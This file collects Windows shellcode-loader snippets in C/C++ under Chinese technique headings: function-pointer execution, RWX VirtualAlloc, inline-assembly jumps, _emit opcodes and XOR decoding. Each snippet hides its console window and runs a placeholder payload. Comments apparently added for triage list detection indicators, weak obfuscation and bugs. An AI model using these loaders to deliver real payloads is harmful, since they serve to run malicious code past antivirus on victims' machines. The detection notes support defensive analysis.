C/C++

// Linker directive: link as a GUI-subsystem PE while keeping the console CRT
// entry point, so the process starts without a console window.
// (Original note: "keeps the Windows console program from showing a black window".)
// For triage, a Windows-subsystem PE whose entry is the console mainCRTStartup
// is an unusual static characteristic that may be worth noting.
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

指针执行

// Placeholder for the raw payload bytes; the literal stands in for the real
// array contents. As a string literal, sizeof buf counts the trailing NUL too.
unsigned char buf[]="shellcode"; 
// GUI subsystem with the console CRT entry point: no console window is created.
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
// Executes the global array in place: the array's address is cast to a
// no-argument function pointer and called, so control transfers into .data.
// That only works if the section is executable; with DEP enforced and no
// executable .data section, the call faults at the first instruction.
// `void main` is a non-standard signature (accepted by MSVC).
void main()
{

((void(*)(void))&buf)();

}

申请动态内存加载

#include<windows.h>
#include<stdio.h>
#include<string.h>
// GUI subsystem with the console CRT entry point: no console window is created.
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
// Placeholder for the payload bytes; sizeof(buf) includes the literal's trailing NUL.
unsigned char buf[]="shellcode";
// Copies the payload into freshly allocated memory and calls it.
void main ()
{
char *Memory;
// One region reserved and committed directly as readable, writable AND
// executable. Private RWX allocations are a well-known shellcode-injection
// indicator and are commonly flagged by EDR and memory scanners.
// NOTE(review): the return value is not checked; a NULL result from a failed
// allocation would be dereferenced by the memcpy below.
Memory=VirtualAlloc(NULL,sizeof(buf),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// sizeof(buf) includes the literal's trailing NUL, which is copied as well.
memcpy(Memory,buf,sizeof(buf));
// Treat the region as a no-argument function and transfer control into it.
((void(*)())Memory)();
}

嵌入汇编加载

#include<windows.h>
#include<stdio.h>
// Linker option marking the .data section readable, writable and executable
// (RWE). The original note said only "read/write"; the E (executable) is the
// operative flag here. An executable .data section is an abnormal PE section
// characteristic that static inspection of the section headers reveals.
#pragma comment(linker,"/section:.data,RWE") // .data: readable, writable, executable
// Placeholder for the payload bytes placed in .data.
unsigned char buf[]="shellcode";
// Jumps into the global array using MSVC inline assembly. 32-bit x86 only:
// `__asm` blocks and the `eax` register are not available in x64 builds.
void main()
{
__asm
{
mov eax,offset buf   // eax = address of buf
jmp eax              // plain jmp (no return address pushed): control enters .data
}
}

强制类型转换

#include<windows.h>
#include<stdio.h>
// GUI subsystem with the console CRT entry point: no console window is created.
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
// Placeholder for the payload bytes, stored in .data.
unsigned char buf[]="shellcode";
// Same in-place execution as the pointer variant, with an explicit WINAPI
// (__stdcall) calling convention on the function-pointer type. With no
// parameters the convention changes nothing about the call itself.
// NOTE(review): the statement has no terminating ';' — as written this
// listing does not compile.
void main()
{
((void(WINAPI*)(void))&buf)()
}

汇编花指令

#include<windows.h>
#include<stdio.h>
// Linker option marking the .data section readable, writable and executable
// (RWE). The original note said only "read/write"; the E (executable) is the
// operative flag. An executable .data section is an abnormal PE section
// characteristic visible in static inspection of the section headers.
#pragma comment(linker,"/section:.data,RWE") // .data: readable, writable, executable
// Placeholder for the payload bytes placed in .data.
unsigned char buf[]="shellcode";
// Same jump-into-.data loader as the inline-assembly listing, but the jump is
// written as raw opcode bytes instead of a mnemonic. 32-bit x86 only.
void main(){
__asm
{
mov eax,offset buf   // eax = address of buf
// FF E0 is the machine encoding of `jmp eax`. Spelling it with _emit changes
// only the source text: the assembled bytes are identical to the mnemonic
// form, so a disassembler, byte signature or emulator sees exactly the same
// instruction. This provides no obfuscation of the compiled binary.
_emit 0xFF
_emit 0xE0 // equivalent to jmp eax
}
}

XOR加密

#include <windows.h>
#include <iostream>
// Decodes a repeating-key XOR-encoded payload into a stack buffer, copies it
// into an RWX allocation and calls it. argc/argv are unused.
int main(int argc, char** argv) {
// Placeholder for the encoded payload; sizeof includes the trailing NUL.
char encryptedShellcode[] = "encryptedShellcode";
// Fixed 5-byte repeating key. It is stored in the binary next to the
// ciphertext, so this defeats only naive byte signatures: an analyst can
// recover the plaintext statically by replaying this loop, and the decoded
// bytes are present in clear in memory (stack buffer and RWX region) before
// the call at the end.
char key[] = "L1ang";
// Unused: nothing reads cipherType.
char cipherType[] = "xor";
char shellcode[sizeof encryptedShellcode];
int j = 0;
// Byte-wise XOR with the key cycled over its 5 characters (`sizeof key - 1`
// skips the key's NUL). The input's trailing NUL is processed too, so the
// final output byte equals the current key byte.
for (int i = 0; i < sizeof encryptedShellcode; i++) {
if (j == sizeof key - 1) j = 0;
shellcode[i] = encryptedShellcode[i] ^ key[j];
j++;
}
// Private RWX allocation (PAGE_EXECUTE_READWRITE): a commonly monitored
// injection indicator for EDR and memory scanners.
// NOTE(review): the return value is not checked; a NULL result would be
// dereferenced by memcpy.
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
// Treat the region as a no-argument function and transfer control into it.
((void(*)())exec)();
}